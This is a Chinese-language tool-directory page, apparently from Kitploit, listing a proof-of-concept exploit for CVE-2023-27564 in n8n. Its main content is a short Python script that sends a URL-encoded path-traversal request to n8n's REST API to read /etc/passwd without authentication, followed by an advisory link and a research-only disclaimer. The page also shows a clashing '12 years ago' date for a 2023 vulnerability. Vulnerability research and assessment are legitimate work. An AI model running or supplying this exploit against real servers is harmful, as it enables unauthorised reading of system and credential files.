Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
exploit-CVE-2023-27564 — CVE-2023-27564的概念验证漏洞利用,通过REST API中的路径遍历在n8n中实现匿名文件读取。用于安全研究和漏洞评估。 | Kitploit
工具/GitHubGitHub/david-botelho-mariano/exploit-cve-2023-27564
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubdavid-botelho-mariano/exploit-cve-2023-27564

exploit-CVE-2023-27564

CVE-2023-27564的概念验证漏洞利用,通过REST API中的路径遍历在n8n中实现匿名文件读取。用于安全研究和漏洞评估。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
12年前尚未审核
分享

CVE-2023-27564 漏洞利用程序

该漏洞允许在 n8n 中匿名读取文件。

root@kitploit:~
import requests

url = "https://example.com/rest/data/filesystem:..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd:.svg"

response = requests.get(url)

print(response.status_code)
print(response.headers)
print(response.text)

来源

https://www.synacktiv.com/sites/default/files/2023-05/Synacktiv-N8N-Multiple-Vulnerabilities_0.pdf

免责声明

本仓库中提供的概念验证(PoC)仅用于教育和安全研究目的。所提供的信息和代码旨在供网络安全专业人员和研究人员使用,以了解并防范软件和系统中的漏洞。未经事先双方同意,使用本 PoC、相关信息或代码攻击目标是非法的,并受到严格禁止。

使用本 PoC 即表示您同意:您了解该 PoC 所演示漏洞的潜在影响,并将以负责任且合乎道德的方式使用它。本 PoC 的作者声明,对任何滥用本材料的行为或使用所提供信息和代码可能导致的任何损害不承担任何责任。遵守所有适用的地方、州、国家和国际法律是最终用户的责任。

作者已尽一切努力确保本仓库中所提供信息的准确性和可靠性。但是,这些信息按“原样”提供,不作任何形式的担保。作者对所含信息的准确性、内容、完整性、合法性或可靠性不承担任何责任或义务。

下载工具